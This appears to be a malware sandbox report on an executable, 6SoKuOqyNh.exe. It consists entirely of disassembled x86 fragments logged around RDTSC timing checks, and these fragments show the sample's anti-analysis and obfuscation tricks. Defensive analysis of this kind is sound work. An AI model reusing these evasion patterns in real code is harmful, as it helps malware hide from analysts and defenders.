Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06574 second address: C065C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC9D915F4B8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jng 00007FC9D915F4B8h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06705 second address: C0670C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06A86 second address: C06A90 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9D915F4BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06A90 second address: C06AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC9D8BCC16Eh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FC9D8BCC168h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push eax 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007FC9D8BCC166h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C07910 second address: C07995 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D915F4CBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC9D915F4C1h 0x00000010 nop 0x00000011 stc 0x00000012 add dword ptr [ebp+122D2D0Bh], esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FC9D915F4B8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 pushad 0x00000035 cmc 0x00000036 jnl 00007FC9D915F4B8h 0x0000003c popad 0x0000003d or edi, 4BD78E00h 0x00000043 push 00000000h 0x00000045 jo 00007FC9D915F4BAh 0x0000004b mov si, 4DE9h 0x0000004f push eax 0x00000050 pushad 0x00000051 jl 00007FC9D915F4BCh 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C077CD second address: C077D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C077D1 second address: C077D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C089C4 second address: C089C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C077D7 second address: C077FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FC9D915F4B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C089C8 second address: C089CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C089CE second address: C089DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C091FC second address: C0920E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C09EE4 second address: C09F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC9D915F4B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 xor si, CF00h 0x0000002c mov si, CED2h 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+12467325h], esi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FC9D915F4B8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 or di, 6527h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b ja 00007FC9D915F4B8h 0x00000061 push eax 0x00000062 push edx 0x00000063 jno 00007FC9D915F4B6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C09CAE second address: C09CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0B59F second address: C0B5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0B31A second address: C0B32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0C088 second address: C0C0CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC9D915F4B8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, ebx 0x00000028 push 00000000h 0x0000002a stc 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0C0CD second address: C0C0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0C0D1 second address: C0C0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12C88 second address: C12CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jno 00007FC9D8BCC178h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CAE second address: C12CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC9D915F4B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CB8 second address: C12CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CBC second address: C12CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC9D915F4C5h 0x0000000f jmp 00007FC9D915F4BDh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C12CDA second address: C12CDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC7CFC second address: BC7D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC9D915F4BDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1329C second address: C132A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC9D8BCC166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C132A6 second address: C132AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C132AA second address: C132C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FC9D8BCC172h 0x0000000f jl 00007FC9D8BCC16Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1438F second address: C14421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC9D915F4B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov edi, dword ptr [ebp+122D34A0h] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FC9D915F4B8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov edi, ecx 0x00000054 mov eax, dword ptr [ebp+122D00C1h] 0x0000005a mov ebx, dword ptr [ebp+1248508Fh] 0x00000060 push FFFFFFFFh 0x00000062 mov bh, al 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 jmp 00007FC9D915F4C3h 0x0000006d pop ecx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C152F8 second address: C152FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C14421 second address: C14426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16121 second address: C16149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FC9D8BCC166h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C152FD second address: C15389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D301Ch] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d xor edi, dword ptr [ebp+122D1974h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FC9D915F4B8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 call 00007FC9D915F4C0h 0x00000049 mov di, si 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D091Dh] 0x00000053 mov edi, dword ptr [ebp+122D2A69h] 0x00000059 mov bl, ah 0x0000005b push FFFFFFFFh 0x0000005d sub edi, dword ptr [ebp+122D3435h] 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jno 00007FC9D915F4C0h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C14426 second address: C1442C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16149 second address: C1614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C15389 second address: C153B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9D8BCC178h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1614F second address: C16153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1442C second address: C14439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C153B5 second address: C153BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C14439 second address: C1443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16153 second address: C161A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FC9D915F4B8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jbe 00007FC9D915F4BAh 0x00000029 mov di, 9838h 0x0000002d push 00000000h 0x0000002f and di, 3876h 0x00000034 push 00000000h 0x00000036 cmc 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC9D915F4C4h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C153BB second address: C153BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C161A4 second address: C161AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C153BF second address: C153C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C16388 second address: C163A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FC9D915F4BCh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C163A0 second address: C163A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C17DC6 second address: C17DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C17DCC second address: C17DE6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC9D8BCC16Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C18CC2 second address: C18D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC9D915F4B8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov ebx, edx 0x00000025 push 00000000h 0x00000027 ja 00007FC9D915F4BCh 0x0000002d push 00000000h 0x0000002f jc 00007FC9D915F4BBh 0x00000035 or di, 5B76h 0x0000003a xchg eax, esi 0x0000003b jmp 00007FC9D915F4BCh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push ecx 0x00000044 pushad 0x00000045 popad 0x00000046 pop ecx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C17F9B second address: C18053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D8BCC16Fh 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FC9D8BCC168h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a clc 0x0000002b push dword ptr fs:[00000000h] 0x00000032 sub bx, CB29h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov bx, cx 0x00000041 mov ebx, dword ptr [ebp+122D2E1Ch] 0x00000047 mov eax, dword ptr [ebp+122D125Dh] 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007FC9D8BCC168h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 mov dword ptr [ebp+122D2E51h], ecx 0x0000006d push FFFFFFFFh 0x0000006f mov bh, E1h 0x00000071 nop 0x00000072 jnc 00007FC9D8BCC170h 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC9D8BCC16Ah 0x00000080 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C18053 second address: C1805D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9D915F4BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1BCA9 second address: C1BCC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1BCC8 second address: C1BCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CD03 second address: C1CD2C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9D8BCC168h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC9D8BCC176h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CD2C second address: C1CD8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC9D915F4BDh 0x0000000f push 00000000h 0x00000011 or dword ptr [ebp+122D30CAh], edx 0x00000017 mov edi, dword ptr [ebp+122D1926h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC9D915F4B8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push eax 0x0000003a mov edi, 29CA581Ch 0x0000003f pop edi 0x00000040 push eax 0x00000041 jbe 00007FC9D915F4C2h 0x00000047 jl 00007FC9D915F4BCh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1FDEB second address: C1FE72 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC9D8BCC16Bh 0x00000010 nop 0x00000011 movzx ebx, dx 0x00000014 push ecx 0x00000015 mov dword ptr [ebp+122D3777h], edi 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FC9D8BCC168h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 jmp 00007FC9D8BCC16Ch 0x0000003d sub ebx, 42E42D6Ah 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FC9D8BCC168h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D322Dh], edx 0x00000065 sub bx, 2151h 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CEF8 second address: C1CEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1CEFC second address: C1CFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 jo 00007FC9D8BCC174h 0x0000000e pushad 0x0000000f mov eax, dword ptr [ebp+122D2B49h] 0x00000015 add dword ptr [ebp+122D2DF9h], ebx 0x0000001b popad 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007FC9D8BCC168h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FC9D8BCC168h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ch 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e jmp 00007FC9D8BCC178h 0x00000063 mov eax, dword ptr [ebp+122D100Dh] 0x00000069 sub bh, FFFFFF9Eh 0x0000006c movsx ebx, si 0x0000006f push FFFFFFFFh 0x00000071 or di, 45ABh 0x00000076 push eax 0x00000077 pushad 0x00000078 jmp 00007FC9D8BCC16Ch 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1DF04 second address: C1DF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C1DF08 second address: C1DF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C20D1D second address: C20D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC9D915F4BCh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 je 00007FC9D915F4C2h 0x00000018 jc 00007FC9D915F4BCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
